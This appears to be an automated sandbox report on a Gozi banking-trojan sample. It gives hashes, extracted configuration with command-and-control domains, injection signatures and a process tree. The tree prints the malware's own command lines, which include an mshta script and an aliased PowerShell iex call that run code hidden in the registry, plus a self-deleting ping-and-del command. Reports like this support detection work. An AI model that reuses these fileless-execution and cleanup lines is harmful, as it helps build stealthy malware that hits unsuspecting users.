Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
06-10-2023 08:49
Static task
static1
General
-
Target
988ac9d35c37f6e957a5f292b871325fece89e106d4ac91d61d7ef5cd657ad8a.exe
-
Size
293KB
-
MD5
f4596eec21608b69a6410f3c1163f290
-
SHA1
db1d45bdd0409d95f6d3b6084cad4e6fe90a3436
-
SHA256
988ac9d35c37f6e957a5f292b871325fece89e106d4ac91d61d7ef5cd657ad8a
-
SHA512
c8d70e20cb3db7f050a0cb75d9f4ae3099760507eb707951c602f2d2de6adb564f87425153c77cae5b465c5efa7f5b4b13be642f8c95c9e14ed2d007e29e8dce
-
SSDEEP
3072:IvjRMbYbmYQDtBRd7QuszTc3iHjL1473r49ot:eWYaYQzRhSOuL1ik9o
Malware Config
Extracted
gozi
Extracted
gozi
5050
mifrutty.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
mifrutty.com
systemcheck.top
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 3476 set thread context of 3136 3476 powershell.exe Explorer.EXE PID 3136 set thread context of 3740 3136 Explorer.EXE RuntimeBroker.exe PID 3136 set thread context of 4004 3136 Explorer.EXE RuntimeBroker.exe PID 3136 set thread context of 2116 3136 Explorer.EXE RuntimeBroker.exe PID 3136 set thread context of 4180 3136 Explorer.EXE RuntimeBroker.exe PID 3136 set thread context of 1444 3136 Explorer.EXE cmd.exe PID 3136 set thread context of 2444 3136 Explorer.EXE cmd.exe PID 1444 set thread context of 1632 1444 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3020 3968 WerFault.exe 988ac9d35c37f6e957a5f292b871325fece89e106d4ac91d61d7ef5cd657ad8a.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 1632 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
988ac9d35c37f6e957a5f292b871325fece89e106d4ac91d61d7ef5cd657ad8a.exepowershell.exeExplorer.EXEpid process 3968 988ac9d35c37f6e957a5f292b871325fece89e106d4ac91d61d7ef5cd657ad8a.exe 3968 988ac9d35c37f6e957a5f292b871325fece89e106d4ac91d61d7ef5cd657ad8a.exe 3476 powershell.exe 3476 powershell.exe 3476 powershell.exe 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 3476 powershell.exe 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 1444 cmd.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 3476 powershell.exe Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 2168 wrote to memory of 3476 2168 mshta.exe powershell.exe PID 2168 wrote to memory of 3476 2168 mshta.exe powershell.exe PID 3476 wrote to memory of 964 3476 powershell.exe csc.exe PID 3476 wrote to memory of 964 3476 powershell.exe csc.exe PID 964 wrote to memory of 3884 964 csc.exe cvtres.exe PID 964 wrote to memory of 3884 964 csc.exe cvtres.exe PID 3476 wrote to memory of 3044 3476 powershell.exe csc.exe PID 3476 wrote to memory of 3044 3476 powershell.exe csc.exe PID 3044 wrote to memory of 3172 3044 csc.exe cvtres.exe PID 3044 wrote to memory of 3172 3044 csc.exe cvtres.exe PID 3476 wrote to memory of 3136 3476 powershell.exe Explorer.EXE PID 3476 wrote to memory of 3136 3476 powershell.exe Explorer.EXE PID 3476 wrote to memory of 3136 3476 powershell.exe Explorer.EXE PID 3476 wrote to memory of 3136 3476 powershell.exe Explorer.EXE PID 3136 wrote to memory of 3740 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 3740 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 3740 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 3740 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4004 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4004 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4004 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4004 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 2116 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 2116 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 2116 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 1444 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 1444 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 1444 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 2116 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4180 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4180 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4180 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4180 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 1444 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 1444 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 2444 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 2444 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 2444 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 2444 3136 Explorer.EXE cmd.exe PID 1444 wrote to memory of 1632 1444 cmd.exe PING.EXE PID 1444 wrote to memory of 1632 1444 cmd.exe PING.EXE PID 1444 wrote to memory of 1632 1444 cmd.exe PING.EXE PID 3136 wrote to memory of 2444 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 2444 3136 Explorer.EXE cmd.exe PID 1444 wrote to memory of 1632 1444 cmd.exe PING.EXE PID 1444 wrote to memory of 1632 1444 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3740
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2116
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4004
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Users\Admin\AppData\Local\Temp\988ac9d35c37f6e957a5f292b871325fece89e106d4ac91d61d7ef5cd657ad8a.exe"C:\Users\Admin\AppData\Local\Temp\988ac9d35c37f6e957a5f292b871325fece89e106d4ac91d61d7ef5cd657ad8a.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 4723⤵
- Program crash
PID:3020 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Raf2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Raf2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name lnaipmax -value gp; new-alias -name enwaqcrre -value iex; enwaqcrre ([System.Text.Encoding]::ASCII.GetString((lnaipmax "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c0kit51u\c0kit51u.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE8BA.tmp" "c:\Users\Admin\AppData\Local\Temp\c0kit51u\CSC2B14C785BC874C8BB16357F4567E24B.TMP"5⤵PID:3884
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kxettnfm\kxettnfm.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9C4.tmp" "c:\Users\Admin\AppData\Local\Temp\kxettnfm\CSC9F57AFA49EBB401DA9B48E79637BB897.TMP"5⤵PID:3172
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\988ac9d35c37f6e957a5f292b871325fece89e106d4ac91d61d7ef5cd657ad8a.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1632 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:2444
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4180
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3968 -ip 39681⤵PID:216
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5944efea90840998cd5331ee20a609837
SHA130117b1aed62eb3ec67c7cadf151b9fb55951310
SHA256de4a3b2ee5395d0f5de58f834f96f04683250d917d709cc7289a7a4840ae4166
SHA51256ef0a0cc48613d98c723ed88b415cb8028c002ee4e6f999e797cf7db1346cb0f7acc156f6534c192ef5e7096d81d04004054281e55b873a869cd26f3e03e112
-
Filesize
1KB
MD597fd08926def7410059e4774265fe056
SHA13237d4814045da1e66609192cac876df50650620
SHA2562abe8656a86dba8c60239973ed2bca35e4b8ffe3d59bdac5633682d2ed340550
SHA512080dbfc5976938582d35f6ad6e80ba193a642093c2128ed692298f50d810e83ab6cde03f4ca5316abbccd16191559b93d2f05b379e2e120a2527323f5d715a94
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5499b539b2a0a24666c70d93cb4e2a4b7
SHA1f8bd75c9a38eb2b45ae4264f15cd5693a360e7a5
SHA256b2ffb4fdae8171f0332c9c65b354f2d0bba3d116ad519573a9aca0ebb6e9e77d
SHA512d1f8c0615b3a8429f361bf8582cc1f599d191c04d425c412a0a4ba6d73008fa15ef8b95a889e046c5a27d2fa67c6bc0ecc7ed0d4de2f073f241b1cb3bd4961f4
-
Filesize
3KB
MD5be72d667618c5941aa3ee8bdfb9c1ca6
SHA1410570c68b9452fe2e10f620aa0420f0777e032e
SHA25611890d11fbd0e3dcf6773028a73d1d8fff9fb3929c8937b710d04fdd81450224
SHA512dad27b4960f7257e336fa409767583fd468c3af5ce954a9cae0357516079e96c1d6f76d1d7883bde44ca2d240b43c57dc564a365f524f51c776ff24370b65af6
-
Filesize
652B
MD51e44e760997547ef0eba147e13c0b4f8
SHA1e66929efef94bd47093be7e97c0103dfbfcd6287
SHA256b681d970b13ad8c0ff7ea6909ae5658a532520c93f293813a1507d6541b4ec67
SHA512e811c4590abd0edc36781076feec6838ad3e3fcfa8015199baf809e2140874d829dec050278dcd1b115d529d1aff60031bd9c1c8cc11d49097b377a15393a893
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD57a4e26e1b8d7dc8a4a0f15dedef8be9d
SHA1280abbfdb37ae6afcfd9a5c3a83f9536e6de867a
SHA2566c1c34c939b8b5bfb9988acba5d6701fbb3848e56d15a0692f30c793207ce769
SHA5126790395f212823b2ba56ca70c36d91a039bb13aa2dab50fa0a4c8e384ccd36f53edb032977d582609008034bd49e6e4e4815213beb42872edc3051c490488b20
-
Filesize
652B
MD5258be0896ea6a1f210c9fd10be8adf29
SHA13df1daddf801027267469f73cec3f8c8edd89d89
SHA256028a69b55fac587d458f9d6275244c6647f121d6e5e4e4b46bc053344f21c031
SHA512a2437da0c75db58dec617a84d28e9c3bfddc2767b5ece2a8558ac4b25ea7c7d36e435e5f984a61d8c1cc2fc504f9d5ae8ec2c0c0d94469fea21759a31c15a86e
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD57cd81fe04c090a7d79b5cdd457e00666
SHA1e3026d078982fb1e6bc2fcdfcf917b1d864ca7b4
SHA256292e475e44eec242884d19a4b19a0da074b85fe74cd628fc7d7cfa41feeb58fd
SHA51229a627a16417ca27008aeb9cec4d7ffb0f36cdbbf671d10afd7b20015c4ad82a5416e3613cf7bdc407d358eb4b3bab34dd523f556b36a6eb42c273f5452d6c55